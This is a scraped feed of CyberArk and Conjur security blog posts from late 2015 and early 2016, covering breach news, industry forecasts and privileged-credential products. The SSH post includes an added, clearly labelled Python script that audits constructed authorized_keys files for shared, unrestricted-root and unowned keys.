  • Cyber Criminals Will Get Even More Aggressive with Ransomware In Their Pursuit of High-Profile Financial Targets. According to an Infosecurity Magazine article, financial services firms are hit by security incidents 300 times more frequently than businesses in other industries. In 2015, the Federal Financial Institutions Examination Council (FFIEC) warned that cyber attacks against financial institutions to extort payment in return for the release of financial information and sensitive data are increasing. In the year ahead, these attacks will become more prevalent and aggressive, as motivated attackers find new ways to utilize ransomware to blackmail individuals and corporations. Not surprisingly, the attackers will follow the money, particularly targeting enterprise organizations that have the resources and are most likely able to pay the requested ransoms.
  • Lines Between Physical and Cyber Terrorism Will Blur. In 2015, devastating acts of terrorism impacted the global community. In 2016, we will increasingly see the convergence of physical and cyber terrorism aimed at wreaking far-reaching havoc. For example, as Reuters reported, a suspected attack on a Ukrainian power grid recently left parts of the country without energy. This attack represents one of the few publicly documented assaults on an industrial target. In late December 2015, the NSA issued a report, “Seven Steps to Effectively Defend Industrial Controls Systems.” The introduction of that report notes that it’s not a matter of if industrial control systems will have an intrusion, but when. Over the next 12 months, we expect to see more headlines of greater coordination between these two types of attacks – and more successful breaches that could negatively impact major health systems, financial markets and energy grids, among others.

What are you tracking in 2016? Share your thoughts on the cyber security landscape. On Twitter use @CyberArk with the hashtag #2016Predictions.

From all of us at CyberArk, we wish you a safe and secure New Year!
Elizabeth Lawler Participates in AllThingsITSM Podcast https://www.cyberark.com/blog/elizabeth-lawler-participates-in-allthingsitsm-podcast/ Wed, 13 Jan 2016 16:18:00 +0000 https://cyberarkvx2.wpengine.com/blog/elizabeth-lawler-participates-in-allthingsitsm-podcast/  

In a podcast for AllThingsITSM, our CEO, Elizabeth Lawler, spoke with Carlos Cassanova and Kirstie Magowan about cybersecurity. In this short and informative session, Elizabeth discusses the universal nature of cybersecurity, pointing out that data breaches have made security a part of daily life.

During the 20-minute conversation, Elizabeth talks about dealing with the increasing threat of data breaches. Whether a breach is caused by malicious actors or misadventures, there will always be errors in the system, so you want to minimize the impact of any one compromised event.

She also mentions that automated security is an improvement to humans trying to do security themselves, as it is the only real, consistent and reproducible solution.

As a woman in tech, Elizabeth chats about breaking through the glass ceiling in a male dominated industry and encourages employers to take proactive steps toward developing more diversified teams.

Sounds interesting, right? Check out the podcast and let us know what you think!
Top 5 Challenges Financial Services Face in Moving to the Cloud https://www.cyberark.com/blog/top-5-challenges-financial-services-face-in-moving-to-the-cloud/ Tue, 12 Jan 2016 15:40:00 +0000 https://cyberarkvx2.wpengine.com/blog/top-5-challenges-financial-services-face-in-moving-to-the-cloud/  

The transition from on-prem to the cloud can feel like a cumbersome task. Often, the tools we used before don’t work, and we worry about the security of data that is no longer stored on premises. Despite the challenges we often face during the various stages of migration, it seems pretty apparent that the cloud is here to stay, as businesses that have made the shift are extremely happy with the end results.

The transformation, however, seems to plague some industries more than others; financial services being one of those fields. Financial services is one of the most highly regulated industries, having to adhere to strict security and compliance regulations. However, the desire to cut costs, move quickly, scale easily, and have data readily available means that migrating to the cloud is key to staying ahead of the competition. So, what are these problems and how can you solve them?

Here are the top 5 challenges and solutions for financial services moving to the cloud.

1. Compliance

Remaining compliant in a highly regulated industry is key. When moving to the cloud, it is crucial that the entire team is on the same page and completely understands what regulatory requirements they must meet.  Make sure that each stakeholder is part of this conversation and approach it as a group effort, rather than a burden on any one team.

2. Integrations

When making the shift to the cloud, you want to be able to continue using the tools you had before. Making sure these tools are properly secured in your new environment can be a challenge. So, how do you keep using the applications you love without compromising security? Find a solution that integrates with your current tool chain. This way, your team doesn’t have to waste time learning how to use new tools that they don’t like and can spend more time innovating with the systems they know and love.

3. Availability

With all of the new security measures in place, and internal changes happening in the organization, you want to make sure that secrets are readily available across all platforms so developers can continue to innovate quickly and efficiently. This highly available structure means quicker time to market, which is ideal for your financial institution.

4. Security

Since financial service organizations deal with highly sensitive data, and often have confidential internal processes, they need to be sure that the information they store in the cloud is safe. Therefore, it is key to give everything in your application an identity. Once you do this, create a well-defined policy that all internal stakeholders can agree to. This policy should be dynamic, not static, so that it can be changed and improved as the organization shifts and grows. Prioritize which people and code, based on their role, have access to which secrets.

5. Audit/Reporting

Now that you have your defined policies and new security measures in place, you want to make sure you have a way of relaying that information to the people who need it. A well-defined audit trail and easy-to-read user interface will ensure that, no matter what, you have the reports you need to show exactly what is happening in your infrastructure, in real time. With a clear UI, your entire team will be able to quickly and efficiently search for and create the reports they need, without having to waste precious development time hunting for the right security report.

Given the sensitive nature of the data accrued, financial institutions must adhere to some of the strictest regulations. For financial organizations that want to utilize all the benefits the cloud has to offer, including faster time to market, cheaper cost, and more optimized processes, understanding the 5 challenges and solutions outlined above is crucial to maintaining security while profiting from these advantages.
Time Warner Cable Suffers Data Breach https://www.cyberark.com/blog/time-warner-cable-suffers-data-breach/ Mon, 11 Jan 2016 18:30:00 +0000 https://cyberarkvx2.wpengine.com/blog/time-warner-cable-suffers-data-breach/  

If you’re like most people who use the same password for multiple accounts, you might want to re-think your strategy. Time Warner Cable (TWC) recently announced that the passwords for more than 320,000 customers’ email accounts had been hacked. This means that the information you put in your emails is also at risk. This is especially troubling if you tend to duplicate your passwords, as a hacker can easily try the same password on a combination of accounts, having all the information they need to make fraudulent online purchases on your credit card or access your personal bank information.

The FBI initially alerted TWC to the breach. Time Warner Cable maintains that it is not at fault for the hack, stating that it was possibly caused “through data breaches of other companies that stored TWC customer information, including email addresses”. The breach is likely to have only affected those in Time Warner’s Roadrunner service (email addresses ending in rr.com); however, all customers are urged to change their passwords as a precaution. In the wake of the hack, it is important to not only change these passwords but also those for all of your other accounts, as this information is typically sold on the dark web.

As of now, the reason for how or why the breach occurred is mere speculation and new details are sure to emerge in the coming weeks. Regardless of whether the breach is the business’s fault directly, it is important for enterprises who suffer a breach to avoid deflecting blame. Leaders in the organization should commit themselves to reviewing the company’s internal security processes and ensure that all security measures are up to par and adequately protect the infrastructure. 

It is troubling that this breach, and similar breaches, are typically labeled as minor since only passwords and email addresses are exposed. It seems we have become so desensitized to these massive hacks that unless our social security number is taken, we see the event as insignificant. There is no longer an expectation of security, and we are less outraged and more placid about breaches as each new one occurs.

Studies have found that three out of four people use duplicate passwords for multiple accounts. This makes the exposure of your email and password information even worse, since these same credentials can be used to log in to a variety of different accounts. Since people do not react as strongly to these types of breaches, they often forget to change all of their passwords, leaving accounts vulnerable for months after they changed the one profile that was exposed. All enterprises must do a better job of securing information, no matter how minor the data may seem, and must be more proactive in ensuring that third-party providers are adhering to strict security policies as well.
Analyst Report Names CyberArk the Overall Privilege Management Leader https://www.cyberark.com/blog/analyst-report-names-cyberark-the-overall-privilege-management-leader/ Fri, 08 Jan 2016 20:05:52 +0000 https://www.cyberark.com/blog//

For the second year in a row, analyst firm KuppingerCole has named CyberArk the “Overall Leader” in its Leadership Compass: Privilege Management 2015 report. This report helps organizations to make intelligent vendor choices as they proactively protect their businesses by securing privileged accounts from malicious attacks.

In the newly released report, KuppingerCole analysts Martin Kuppinger and Amar Singh explore the role of privileged account security in mitigating the risk of devastating cyber attacks, as well as managing emerging threats associated with enterprise mobile and cloud adoption. According to the report, “even the most sophisticated attacker would find it almost impossible to succeed without having access to privileged credentials.” Market awareness of this point is growing not only through our continued market education, but also via analyst reports that advocate for privileged account security to be on the top of the enterprise security priority list.

According to the report, privilege management “requires a robust policy and process framework but also technology that can support the policy requirements.” As such, truly mature Privilege Management solutions “go much further than simple password generation and access control to individual systems, but also provide a unified, robust and – importantly – transparent Privilege Management platform which is integrated into an organization’s overall Identity and Access Management (IAM) strategy.”

To identify the frontrunners in this market, the report analyzed 12 vendors across four key evaluation categories: Overall, Product, Market and Innovation. Based on in-depth analysis and a combined rating of product strength, market presence and innovation, CyberArk surpassed all other vendors and was named the Leader across each evaluation category. Dubbed the “Gold Standard” and the “one to beat in Privilege Management,” the CyberArk Privileged Account Security Solution was also recognized for its robust capabilities for threat analytics and alerts; session management and monitoring; account management; least privilege management; support for AWS and Microsoft Azure management consoles and large partner ecosystem.

We encourage you to read the full report, but here’s a quick sound bite from KuppingerCole founder and principal analyst Martin Kuppinger:

“In the increasingly complex cyber threat landscape, privileged account security has become a business imperative. With proven, innovative products and firm understanding of how to address customers’ most critical IT security challenges, we named CyberArk the Overall Leader in Privilege Management for the second year in a row. CyberArk should be included in every vendor evaluation and product selection process for Privilege Management.”

For an overview of the privilege management market, please download a complimentary copy of the full KuppingerCole report here.
Mitigate Cyber Security Risks with NIST Recommended Controls to Secure SSH https://www.cyberark.com/blog/mitigate-cyber-security-risks-with-nist-recommended-controls-to-secure-ssh/ Tue, 05 Jan 2016 18:25:46 +0000 https://www.cyberark.com/blog//

The Secure Shell (SSH) protocol has been used for well over a decade, but its use has typically flown under the radar of security teams. As a result, this protocol, which was initially designed to secure remote access between systems, has also had the unintended consequence of creating major security holes in mission critical assets. Recognizing the risks, NIST recently released an Internal Report that highlights the prevalence of SSH within the enterprise IT infrastructure, common vulnerabilities associated with SSH and recommended controls to better secure SSH and protect critical systems.

If you don’t typically work with Unix or Linux systems, it’s likely you’ve never knowingly used SSH. SSH is commonly used by interactive users to securely access remote Unix and Linux systems, and it is often used in secure file transfer processes and point-to-point tunneling to protect sensitive data transferred between systems. Given the nature of its use, most SSH-based access is privileged access. Yet, unlike privileged passwords, the SSH keys used to establish SSH connections are rarely protected, managed or even known.

“Because SSH is the primary secure access method used for administration and automated processes on mission critical systems, its security is crucial.” –NISTIR 7966

Because SSH has been commonly used for over a decade with little oversight, organizations can have hundreds of thousands of valid SSH keys with no insight into where these SSH keys live, what trusts exist between key pairs or who has access to the keys. Without any control over these keys, it can be easy for an attacker to compromise an SSH key and use it to gain persistent access to critical systems – without raising any red flags. Worse, when organizations take proactive steps to control password-based access to privileged accounts on Unix and Linux systems, SSH key-based access can be used to bypass these privileged account management controls. As a result, organizations can be left with an increased risk of attack using SSH keys and little, if any, ability to detect a key compromise.

To help organizations address these risks, NIST issued a series of recommended controls to better secure and manage SSH keys, and thus better protect critical systems from compromise. Because SSH keys provide privileged access to critical systems, NIST’s recommended controls for SSH keys are very similar to those for privileged passwords.

NIST recommended controls include:

  • Account Management to rotate, audit and control access to private SSH keys.
  • Access Enforcement to prevent users from granting themselves access to critical systems and privileged SSH keys.
  • Least Privilege to limit root access to only situations in which it is absolutely necessary.
  • Auditing and Monitoring to track who or what accessed a particular system using an SSH key.
  • Risk Assessment to discover and validate SSH-key based trust relationships between users and systems.
  • Identity and Authentication to associate SSH keys with individual users or systems and detect unauthorized SSH-key based access.
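As an added example that is not part of the post or of NISTIR 7966, the Python script below implements the discovery side of the Risk Assessment, Least Privilege and Identity controls listed above: it parses a constructed set of `authorized_keys` files collected from several hosts, fingerprints each key the way OpenSSH does (SHA256 over the decoded key blob), builds the trust map from key to the accounts that accept it, and reports keys trusted by more than one account, keys accepted by root without `from=`/`command=` restrictions, and keys that carry no owner comment. The hosts, accounts and key blobs are constructed (the blobs are deterministic bytes wrapped in the ssh-ed25519 wire format so that fingerprinting works as it would on real keys; they are not real keys).

```python
import base64
import hashlib
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass
class Trust:
    """One SSH key-based trust: a public key accepted by an account on a host."""
    host: str
    account: str
    key_type: str
    fingerprint: str
    comment: str                       # owner comment, "" if absent
    options: Dict[str, Optional[str]]  # authorized_keys options; flags map to None


# One authorized_keys line: [options] type base64-blob [comment]
_LINE = re.compile(
    r"^(?:(?P<opts>\S.*?)\s+)?"
    r"(?P<type>ssh-ed25519|ssh-rsa|ecdsa-sha2-nistp(?:256|384|521))\s+"
    r"(?P<blob>[A-Za-z0-9+/]+=*)(?:\s+(?P<comment>.*?))?\s*$"
)
# name or name="quoted value" (quoted values may contain commas and spaces)
_OPTION = re.compile(r'([\w-]+)(?:="((?:[^"\\]|\\.)*)")?')


def fingerprint(blob_b64: str) -> str:
    """OpenSSH-style SHA256 fingerprint of a base64 public key blob."""
    digest = hashlib.sha256(base64.b64decode(blob_b64)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def parse_options(text: str) -> Dict[str, Optional[str]]:
    return {m.group(1): m.group(2) for m in _OPTION.finditer(text)}


def parse_authorized_keys(host: str, account: str, content: str) -> List[Trust]:
    trusts = []
    for line in content.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = _LINE.match(line)
        if not m:
            continue  # unknown key type or malformed line; report separately in practice
        trusts.append(Trust(host, account, m.group("type"), fingerprint(m.group("blob")),
                            m.group("comment") or "", parse_options(m.group("opts") or "")))
    return trusts


def inventory_trusts(inventory: Dict[Tuple[str, str], str]) -> List[Trust]:
    """inventory maps (host, account) to the content of that account's authorized_keys."""
    trusts: List[Trust] = []
    for (host, account), content in inventory.items():
        trusts.extend(parse_authorized_keys(host, account, content))
    return trusts


def assess(trusts: List[Trust]) -> List[Tuple[str, str, List[str]]]:
    """Return (fingerprint, issue, [account@host, ...]) for each control violation."""
    issues = []
    by_fp: Dict[str, List[Trust]] = defaultdict(list)
    for t in trusts:
        by_fp[t.fingerprint].append(t)
    for fp, ts in by_fp.items():           # Risk Assessment: one key, many trusts
        if len(ts) > 1:
            issues.append((fp, "shared", sorted(f"{t.account}@{t.host}" for t in ts)))
    for t in trusts:
        restricted = "from" in t.options or "command" in t.options
        if t.account == "root" and not restricted:   # Least Privilege / Access Enforcement
            issues.append((t.fingerprint, "unrestricted_root", [f"{t.account}@{t.host}"]))
        if not t.comment:                            # Identity: no owner recorded
            issues.append((t.fingerprint, "no_owner", [f"{t.account}@{t.host}"]))
    return issues


def constructed_ed25519_blob(seed: int) -> str:
    """NOT a real key: 32 deterministic bytes in the ssh-ed25519 wire format."""
    key_bytes = hashlib.sha256(seed.to_bytes(4, "big")).digest()
    ssh_string = lambda b: len(b).to_bytes(4, "big") + b
    return base64.b64encode(ssh_string(b"ssh-ed25519") + ssh_string(key_bytes)).decode()


KEY_A = constructed_ed25519_blob(1)   # an admin's workstation key
KEY_B = constructed_ed25519_blob(2)   # a deployment automation key
KEY_C = constructed_ed25519_blob(3)   # a key nobody labelled
# Constructed sample inventory: (host, account) -> authorized_keys content
INVENTORY = {
    ("web01", "deploy"): f'from="10.1.0.0/24",command="/usr/local/bin/deploy.sh",no-pty ssh-ed25519 {KEY_B} deploy@ci\n'
                         f'ssh-ed25519 {KEY_A} alice@laptop\n',
    ("web02", "deploy"): f'from="10.1.0.0/24",command="/usr/local/bin/deploy.sh",no-pty ssh-ed25519 {KEY_B} deploy@ci\n',
    ("db01", "root"):    f'# constructed sample\nssh-ed25519 {KEY_A} alice@laptop\nssh-ed25519 {KEY_C}\n',
}

if __name__ == "__main__":
    for fp, issue, where in assess(inventory_trusts(INVENTORY)):
        print(f"{issue:18} {fp}  {', '.join(where)}")
```

On the sample, the admin's key is reported as shared between `deploy@web01` and `root@db01` and as an unrestricted root key; the deployment key is shared across the two web hosts but carries `from=` and `command=` restrictions, so it is listed only so the trust can be validated; the unlabelled key on `db01` is flagged both as unrestricted root access and as having no owner to associate it with.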

By following the controls recommended in NISTIR 7966 and applying the same level of security to both privileged passwords and privileged SSH keys, organizations can minimize privileged account risks across the enterprise and significantly reduce the likelihood of a successful attack.

Learn more about how CyberArk can help your organization to address NISTIR 7966 recommendations and about CyberArk’s solution to secure, rotate and control access to SSH keys.
2015: Conjur’s Year In Review https://www.cyberark.com/blog/2015-conjurs-year-in-review/ Mon, 04 Jan 2016 19:54:00 +0000 https://cyberarkvx2.wpengine.com/blog/2015-conjurs-year-in-review/  

These past 12 months at Conjur have been nothing short of remarkable.  As we take a look back at 2015, we wanted to reflect on how far we have come, and how much we’ve grown.  Here are a few of our favorite moments and some of the milestones we are most proud of.

 A Year of DevOps

January

Andrew, Joanna, and Marta joined the team

We did some skiing, and Q1 planning, at the Bretton Woods Mount Washington Hotel.

We released our HIPAA Compliance Guide

 

February

Our Most Read Blog Post: SecDevOps: Can there be happiness in security work?

We published a guest blog post for Chef

The Ultimate Guide to DevOps Security was created.

 

March

Wes Joined the team

We moved into our new office space

Our CTO led a four hour workshop at ChefConf on Building Self-Documenting Applications

Released the Conjur 4.4 product update

 

April

We released our new Rest API documentation

We sponsored RSA and our CEO, Elizabeth Lawler presented “Is DevOps Breaking Your Company?”

Our Most Read Blog Post: Securing Heroku Apps

SDX Central wrote about Elizabeth and her talk at RSA

May

Josh joined the team

Our Most Read Blog Posts: Get Your Secrets Into Source Control and A Software Defined Firewall for Heroku

We released our Securing Jenkins Video

 

June

Alan joined the team

Summon, our open source project, was released

Josh spoke in London at DevOps Connect

Our Most Read Blog Post: Securing Docker with Secrets and Dynamic Traffic Authorization

Conjur listed as a top tool for DevOps in the Cloud

 

July

Mark and Mitch joined the team

The team headed to Las Vegas for Black Hat

Our Most Read Blog Post: Why Continuous Integration and Continuous Delivery Are Not the Same

 

August

We had some fun and team building at Escape the Room in Boston

Dustin Collins spoke about security at DevOpsDays Pittsburgh

In order to better secure Jenkins we released our Deployment Server Reference Architecture

We were named as one of Venture Beat’s most promising seed stage startups

Our Most Read Blog Post: Scaling Enterprise DevOps Security with Machine Identity

 

September

Dustin B. and Kurt joined the team

A few members of our team had a fantastic time sponsoring and attending DevOpsDays Boston

Our Most Read Blog Post: Secrets and Source Control: A Maturity Model

We created the CISO’s Secrets Management Checklist

 

October

Kerry, Matt, and our intern Ari joined the team

We threw a Halloween party in our office 

We released our all new User Interface

Josh Bregman taught attendees at Puppet Conf how to use Puppet with a secrets server

Conjur 4.5 was officially released

Elizabeth headed to New York to participate in a security panel at Velocity Conference.

We sponsored DevOps Enterprise

We were featured as Network World’s Product of the Week

November

Virginia joined the team 

Box chooses Conjur as its comprehensive security platform

Our Most Read Blog Post: Everyone’s Using Docker Now It’s Time to Secure It

December

We hosted our Conjur Holiday Party

Our partnership with SSH Communications Security began

Rafal guest blogged for Puppet Labs: Using Node Side Secrets with Conjur

We released our data breach infographic – The Unlucky 13: 2015’s Biggest Breaches


We have learned so much from all of our customers this year and are sincerely looking forward to everything we have on the horizon for 2016. Stay tuned for new product features and check out our blog regularly for helpful guides and key takeaways on security. We can’t wait to continue interacting with you on social and chatting with you at the many conferences and events we will be attending in the coming months. Wishing you and yours a healthy and happy New Year!

]]>
Millions of Voter Records Left Exposed https://www.cyberark.com/blog/millions-of-voter-records-left-exposed/ Wed, 30 Dec 2015 14:05:00 +0000 https://cyberarkvx2.wpengine.com/blog/millions-of-voter-records-left-exposed/  

If you’re the type of person who likes to keep their political affiliations off of the internet, avoiding partisan tweets, posts, and snaps, you seem to be out of luck. A white hat hacker recently uncovered 191 million exposed records of voter information. Included in the long list of data is the political party that you are registered under and a detailed account of the primaries and elections you decided to vote in, and those that you chose to skip.

With 191 million records exposed, this is the largest data breach of 2015. There is still a long way to go until election day, and as most of the presidential hopefuls are just picking up steam, you will probably see many more cyberattacks with political aims in the coming year. As the dynamics shift and new candidates take the lead in the polls while others drop out, attackers will likely work to expose information about these people, aimed either at helping their campaigns or at hurting them.

Here’s everything you need to know:

According to this piece on Hacked, the 300GB of leaked data dates as far back as 2000. The white hat hacker who uncovered the information, Chris Vickery, confirmed the data he found was all accurate after finding his own details, and the accurate details of others, on the list.

Forbes reports that “it would appear every registered US voter is included in the leak.” Thankfully, Social Security numbers were not exposed. It was initially assumed that the digital campaign company NationBuilder was to blame for the leak; however, spokespeople for the company insist that the IP address linked to the exposed database did not belong to them or to one of their hosted clients. It is still unclear who is responsible for leaving the information exposed.

Fortune outlines the information that was likely exposed. The list contained the voter’s name, date of birth, gender, address, ethnicity, party affiliation, e-mail address, phone number, state voter ID, and whether he or she is on the “Do Not Call” list. What is most alarming is that this combination of fields, in the wrong hands, is a ready-made dataset for targeted phishing and identity theft.

The San Francisco Chronicle points out that this breach shows a need for increased voter data security. The author maintains that although campaigns have a legitimate need to access voter data, there should be stricter security requirements in place before the information is handed over, because voter privacy should be the top priority.

This piece from CSO Online looks at the leak from an interesting perspective. The author points out that although voter information is typically public to begin with, what is public is determined on a state-by-state basis. Different states have different rules about how the information can be distributed, so people living in states with stricter laws would have information exposed that would otherwise be kept private. The author also notes that there are strict guidelines on what voter data may be used for: people who obtain voter information are not allowed to use it for commercial gain, for example. With this entire trove of information exposed, however, the data is unprotected and can be used in a multitude of unregulated ways.

Conclusion

This specific instance doesn’t appear to be politically malicious in nature; it was caused by a misconfigured database that left voter records exposed. However, the politically aimed cyberattacks that are sure to follow are reason for concern, since innocent voters will likely be impacted. Politicians put themselves out there; they are on the public stage and open themselves up to having their dirty laundry exposed. Whether right or wrong, this is just the way it is: there is no privacy for public figures. But what about us? What about the people who decide not to put on a show, those of us who keep our positions and opinions to ourselves? Our information is, unfortunately, going to be disclosed as well. If candidates don’t start securing their campaign data now, we are in for a lot of trouble. It is their duty to keep their supporters’ information safe. That way, when your Republican uncle or liberal grandmother decides to send $10 to either Donald Trump’s or Hillary Clinton’s campaign, those donations can stay anonymous, as they should be.

]]>
Short Video: Learn how CyberArk Secures and Manages Privileged Credentials Used by COTS Applications https://www.cyberark.com/blog/short-video-learn-how-cyberark-secures-and-manages-privileged-credentials-used-by-cots-applications/ Tue, 22 Dec 2015 20:26:28 +0000 https://www.cyberark.com/blog//

For more than a decade, Evan Litwak, CyberArk’s principal sales engineer, has worked with many companies to architect and successfully deploy privileged account security measures. For several years, he also worked directly for a large enterprise company and there, he was responsible for the global expansion of privileged identity management.

Given his depth of knowledge and expertise, I asked him to provide a brief overview of how CyberArk technology enables organizations to securely manage hard-coded and embedded credentials in commercial off-the-shelf (COTS) and other applications. Our colleague, CyberArk EVP Adam Bosnian, recently wrote about the range of applications in an enterprise that require access to privileged credentials to perform tasks such as vulnerability management or discovery. With CyberArk Application Identity Manager integrated with COTS applications, organizations can reduce the risk of unauthorized application credential usage and simplify credential management, while maintaining the performance requirements of mission-critical applications.

Key Functionality of CyberArk’s Application Identity Manager:

  • Eliminates hard-coded privileged credentials in COTS applications. The credentials are instead centrally stored in the CyberArk Secure Digital Vault™ and retrieved when needed, using an SDK embedded in the application code.
  • Offers automatic or on-demand rotation of privileged credentials used by COTS applications without any downtime to the applications or the need for a maintenance window.
  • Maintains operational continuity and high availability because credentials are stored in the Credential Provider’s secure local cache to ensure fast retrieval and availability, independent of network availability or performance.

In a three-minute video, Evan explains how CyberArk’s Application Identity Manager enables companies to safely rotate credentials on demand.

Watch the video:

]]>
Security Industry Report Identifies Credentials as a Gateway to Protected Health Information https://www.cyberark.com/blog/security-industry-report-identifies-credentials-as-a-gateway-to-protected-health-information/ Tue, 22 Dec 2015 14:38:00 +0000 https://www.cyberark.com/blog//

Healthcare companies and protected health information (PHI) have been at the center of some of the largest attacks in 2015. If you have been following the frequency of headlines, you may wonder just how prevalent these breaches are. Well, the numbers are in. Last week, Verizon issued the 2015 Protected Health Information Data Breach Report, the first extension of the annual Data Breach Investigations Report.

The report is focused on health information data, but it’s important to note the impact is not limited to the healthcare industry alone. Organizations across many industries have access to health information perhaps from employee records, worker’s compensation or for other reasons. As noted in the report, “The fact that an organization is not in the healthcare industry or isn’t a HIPAA-covered entity doesn’t mean that it’s not at risk of a PHI data breach.”

In 2015, according to the report, 90 percent of industries experienced a breach of PHI, and in total more than 392 million records were exposed. While not all of these incidents were malicious (some were the result of accidental insider activity), the outcome was the same for the organizations: mandatory reporting, regulatory fines, potential lawsuits and a loss of confidence from the individuals impacted.

Interestingly, when Verizon analyzed the different types of data exposed during these breaches, the bulk of the information fell into one of four categories:

  • Medical records
  • Payment or payment card industry (PCI) information
  • Personal or personally identifiable information (PII)
  • Credentials

The inclusion of credentials in this group might seem to be a bit odd, but when you consider the information that credentials can provide access to, it makes sense. As noted in the report, “compromised credentials often are the gateway to the theft of data of other types.” Credentials are used by doctors to access patients’ electronic health records, by system administrators to maintain healthcare management systems and by pharmacy systems to retrieve and verify prescription information, to name just a few examples. Credentials that can be used to access sensitive and protected information must be treated like any other privileged credential in your IT environment.

Privileged account security solutions enable organizations to better secure PHI, PII and other sensitive information by effectively securing the accounts and credentials used to access this information. It’s important to proactively secure privileged account credentials, control and isolate privileged user sessions and monitor the use of these privileged accounts to detect anomalous activity that could indicate unauthorized access. By implementing such a solution, organizations can reduce the risk of a malicious PHI breach, prevent the accidental misuse of PHI by insiders and quickly locate abnormal activity in order to stop an attack before it becomes serious.

To learn how CyberArk can help to protect the privileged accounts that provide access to PHI, PII and other sensitive data, please visit our Privileged Account Security web page.

]]>
Looking Ahead: The 2016 Data Breach Forecast https://www.cyberark.com/blog/looking-ahead-the-2016-data-breach-forecast/ Tue, 22 Dec 2015 14:45:00 +0000 https://cyberarkvx2.wpengine.com/blog/looking-ahead-the-2016-data-breach-forecast/  

As we develop our business plans for the New Year, it is important to take a look at the most recent industry predictions in order to determine our key focus for the months ahead. Experian recently released its 2016 Data Breach Industry Forecast, outlining the developing data breach trends and urging enterprise leaders to craft security plans according to the predicted risks.

It is no shock that healthcare was at the top of the list of industries at heightened risk of cyberattacks in 2016. Experian says that “91% of all health organizations reported at least one data breach over the past few years.” The healthcare industry deals with some of our most sensitive information. As more medical records go digital and more data is transmitted by new wearable technologies, there are even more places for attackers to find vulnerabilities and reach sensitive information. These developments, together with the implementation of the Affordable Care Act, which has put more people in the system than ever before, mean an increased likelihood of cyberattacks. Medical records are among the most valuable on the black market and far more lucrative than credit card information for attackers, so it is no surprise that breaches are predicted to increase over the next year.

The forecast also cautions that businesses can’t solely focus on outsider threats. Breaches are often the result of employee negligence and mishandling of data. Therefore, it is vital to have systems in place to monitor employee activity.

Although many businesses now accept EMV chip cards, the technology has yet to be enabled in every store; many small (and big) businesses still do not take chip cards. Additionally, these new cards, while much more secure, do not make payment breaches impossible. Enterprises can’t rely solely on EMV technology to keep information safe and must remain vigilant in properly securing payment information. Since chip cards are much harder to counterfeit than magnetic-stripe cards, fraud will likely shift to online, card-not-present transactions.

Over 60 countries are creating tools for computer espionage, and 29 countries now have formal units dedicated to cyber efforts. It is predicted that there will be an increase in cybercrime, specifically in incidents focused on exposing both corporate and government secrets as well as activities to disrupt military operations. These attacks, although focused on revealing specific information, will most likely also expose the personal information of millions of people. Although the OPM breach was likely meant to target specific records, people who were not the intended targets were affected as well. According to Experian, the U.S. Director of National Intelligence has ranked “cybercrime as the No. 1 National threat, ahead of terrorism, espionage, and weapons of mass destruction.”

Hacktivism is also expected to make a comeback in 2016. Since many cyber criminals are motivated by ideological instead of monetary gains, institutions with polarizing opinions should be prepared. These types of attacks are aimed to ruin the reputation of the business and are often very difficult to resolve. Therefore, it is very important for businesses to make sure they are properly secured, in order to avoid, or at least mitigate, some of the damage.

2016 seems to be another year filled with cybercrime. However, these predictions are not set in stone. If businesses properly protect themselves they can avoid headlining the nightly news because of a data breach. With the proper secrets management solutions in place, sensitive data can remain untouched, and enterprises can save themselves millions of dollars and headaches.

]]>
The Importance of Protecting and Managing Privileged Credentials for Security Scanning https://www.cyberark.com/blog/the-importance-of-protecting-and-managing-privileged-credentials-for-security-scanning/ Fri, 18 Dec 2015 16:53:20 +0000 https://www.cyberark.com/blog//

Guest Post — by Manish Patel, Sr. Solutions Marketing Manager, Tenable Network Security

According to the Verizon Data Breach Investigations Report (DBIR), vulnerability management and continuous monitoring programs can be very effective in proactively preventing breaches as well as detecting compromised systems. As with many enterprise applications, vulnerability management solutions require the same level of access to privileged account credentials as IT administrators. When performing a security scan or compliance audit, privileged access to target systems is often necessary in order to obtain richer scan results. Organizations understand this, but they also have a difficult time managing, maintaining and securing the related credentials. When it’s done manually, it’s cumbersome.

Case in point, I recently met with an IT director for a retailer to understand how he uses Tenable products. I was surprised to learn that his team was not using the full capabilities for credentialed scans. I proceeded to share the benefits of credentialed scanning, noting the advantages over remote scanning. For example, I explained credentialed scanning can identify whether a patch for a given vulnerability has been applied in a method that is far more accurate (and safer) than running a remote check. Tenable’s credentialed scans can detect client side software in addition to software vulnerabilities and are executed on the host itself rather than across the network – a process that is not disruptive to operations and consumes far less system and network resources. Credentialed scans also offer deeper insight, providing greater visibility into the host by reading password policies, obtaining a list of USB devices, checking anti-virus software configurations and even enumerating Bluetooth devices attached to scanned hosts.

Yet, despite all the benefits, the IT director’s simple response was that it was too difficult to manage credentials individually on multiple security solutions in their distributed environment.

This customer’s challenge – the same challenge faced by many enterprise security professionals – highlights the impetus for Tenable and CyberArk’s technology integration which enables customers to maximize their existing investments and ease the process of protecting and managing privileged credentials for scanning across the enterprise.

Using Tenable’s Nessus® vulnerability management solution and SecurityCenter Continuous View™ solution with CyberArk Application Identity Manager allows customers to secure and centrally manage privileged credentials to hosts for vulnerability, compliance, malware and web application scanning.

At a high level, the products work together as follows (the original post includes an integration diagram, not reproduced here):

When a credentialed scan is needed, Tenable’s solutions are configured to automatically query the CyberArk solution for privileged credentials. CyberArk provides the requested privileged credentials, and Tenable’s solutions use them to log into the target system to perform vulnerability and configuration auditing.

For the IT director with whom I spoke and many others in a similar situation, this integration offers the benefits of performing credentialed scans while at the same time eliminating the need to manually configure, store and rotate privileged credentials. This provides secure management and monitoring of privileged and administrative credentials. Furthermore, this integration allows organizations to more thoroughly address enterprise wide security mandates to lock down privileged credentials.

To learn more about the integration, please visit the Technology Integrations page on Tenable’s website. Visit CyberArk’s website for more information about CyberArk Application Identity Manager. For technical details on configuring the solutions, please contact your Tenable or CyberArk support team.

]]>
Conjur Partners with SSH Communications Security https://www.cyberark.com/blog/conjur-partners-with-ssh-communications-security/ Thu, 17 Dec 2015 16:25:00 +0000 https://cyberarkvx2.wpengine.com/blog/conjur-partners-with-ssh-communications-security/  

Conjur is very happy to announce that we have just partnered with SSH Communications Security, the inventor of the SSH protocol and creator of solutions that allow teams to enable, monitor, and manage encrypted networks.

